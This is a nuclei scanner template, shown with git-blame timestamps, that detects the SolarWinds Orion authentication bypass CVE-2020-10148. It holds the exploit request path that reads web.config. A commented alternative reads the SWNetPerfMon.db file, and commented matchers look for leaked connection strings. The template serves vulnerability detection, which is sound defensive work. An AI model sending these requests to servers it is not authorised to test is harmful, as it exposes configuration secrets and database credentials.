nuclei-templates/cves/2020/CVE-2020-10148.yaml

49 lines
1.3 KiB
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-10148
2020-12-29 07:32:08 +00:00
info:
name: SolarWinds Orion API Auth Bypass Leads to RCE (SUPERNOVA)
author: dwisiswant0
severity: high
description: |
This template could allow to bypass authentication and execute API
commands which may result in a compromise of the SolarWinds instance.
reference: https://kb.cert.org/vuls/id/843464
tags: cve,cve2020,solarwinds,rce
2020-12-29 07:32:08 +00:00
# References:
# - https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/solarwinds-lfi-cve-2020-10148.yaml
2020-12-29 07:32:08 +00:00
# - https://gist.github.com/0xsha/75616ef6f24067c4fb5b320c5dfa4965
2020-12-31 09:12:13 +00:00
# - https://twitter.com/0xsha/status/1343800953946787847
2020-12-29 07:32:08 +00:00
requests:
- method: GET
path:
2021-01-01 10:40:35 +00:00
- "{{BaseURL}}/web.config.i18n.ashx?l=nuclei&v=nuclei"
2021-01-01 10:38:09 +00:00
2021-01-01 10:40:35 +00:00
# - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei"
# Above path can be used if you are looking to scan for "SWNetPerfMon.db" file.
2021-01-01 10:38:09 +00:00
2020-12-29 07:32:08 +00:00
matchers-condition: and
matchers:
2020-12-31 08:51:24 +00:00
- type: word
words:
- "SolarWinds.Orion.Core."
2021-01-01 11:33:22 +00:00
part: body
- type: word
words:
2021-01-01 10:38:09 +00:00
- "text/plain"
2021-01-01 11:33:22 +00:00
part: header
2021-01-01 10:38:09 +00:00
2020-12-29 07:32:08 +00:00
- type: status
status:
- 200
2021-01-01 10:38:09 +00:00
# - type: word
# words:
# - "Connection String"
# - "text/plain"
# part: all
2021-03-10 14:03:49 +00:00
# condition: and
2021-01-01 10:38:09 +00:00
#
# Commented matchers can be used for "SWNetPerfMon.db" file.